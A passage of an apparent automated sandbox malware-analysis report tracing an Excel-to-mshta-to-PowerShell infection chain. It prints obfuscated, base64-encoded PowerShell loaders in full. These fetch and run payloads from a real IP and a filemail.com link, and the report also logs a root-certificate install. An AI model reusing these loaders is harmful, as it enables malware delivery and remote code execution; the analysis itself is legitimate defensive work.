})[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3dubG9hZERhdGEoZTNJaW1hZ2VVcmwpO2UzSWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZycrJ106OlVURjguR2V0U3RyaW5nKGUzSWltYWdlQnl0ZXMnKycpO2UzSXN0YScrJ3J0RmxhZycrJyA9IEhldTw8QkFTRTY0X1NUQVJUPj5IZXU7ZTNJZW5kRmxhZyA9JysnIEgnKydldTw8QkFTRTY0X0VORD4+SGV1O2UzSXN0YXJ0SW5kZXggPSBlM0lpbWFnZVRleHQuSW5kZXhPZihlM0lzdGFydEZsYWcpO2UzSWVuZEluZGV4ID0gZTNJaW1hZ2VUZXh0LkluZGV4T2YoZTNJZW5kRmxhZyk7ZTNJc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW5kIGUzSWVuZEluZGV4IC0nKydndCBlM0lzdGFydEluZGV4O2UzSScrJ3N0YXJ0SW5kZXggKz0gZTNJc3RhcnQnKydGbGFnLkxlJysnbmd0aDtlM0liYXNlNjRMZW5ndGggPSBlM0llbmRJbmRleCAtIGUzSXN0YXJ0SW5kZXg7ZTMnKydJYmFzZTY0Q29tbWFuZCA9IGUzSWltYWdlVGV4dCcrJy5TdWJzdHJpbmcoZTNJc3RhcnRJbmRleCwgZTNJYmFzZTY0TGVuZ3RoKTtlM0liYXNlNjRSZScrJ3YnKydlJysncnNlZCA9IC1qb2luIChlM0liYXNlNjRDb21tYW5kLlRvQ2gnKydhckFycmF5KCkga1VpIEZvckVhY2gtT2JqZWN0IHsgZTNJXyB9KVstMS4uLShlM0liYXNlNjRDb21tYW5kLkxlbmd0aCldO2UzSScrJ2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoZScrJzNJYmEnKydzZTY0UmV2ZXJzZWQpO2UzJysnSWxvYWRlJysnZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SJysnZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChlMycrJ0ljb21tYW5kQnl0ZXMpO2UzSXZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoSGV1VkFJSGV1KTtlM0l2YWlNZXRob2QuSW52b2tlKGUzSW51bGwsIEAoSGV1dHh0JysnLk1STUFDLzEyMzEvNTcxLjQ0LjI3MS43MDEvLzpwdHRoSGV1LCBIZXVkZXNhdGl2YWRvSGV1LCBIZXVkZXNhdCcrJ2l2YWRvSGV1LCAnKydIZXVkZXNhdGl2YWRvSGV1LCBIZXVDYXNQb2xIZXUsIEhldWRlc2F0aXZhZG9IZXUsIEhldWRlc2F0aXZhZG9IZXUsSGUnKyd1ZGVzYXRpdmFkbycrJ0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldWRlc2F0aXZhZG9IZXUsSGV1ZGVzYXRpdmFkb0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldTFIZXUsSGV1ZCcrJ2VzYXRpdmFkb0gnKydldSkpOycpLnJFUGxhQ0UoKFtjSEFSXTcyK1tjSEFSXTEwMStbY0hBUl0xMTcpLFtTVFJJTkddW2NIQVJdMzkpLnJFUGxhQ0UoKFtjSEFSXTEwNytbY0hBUl04NStbY0hBUl0xMDUpLFtTVFJJTkddW2NIQVJdMTI0KS5yRVBsYUNFKCdlM0knLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline"			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_000007FE899E022D push eax; iretd		5_2_000007FE899E0241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_000007FE899E00BD pushad ; iretd		5_2_000007FE899E00C1

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.dll

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
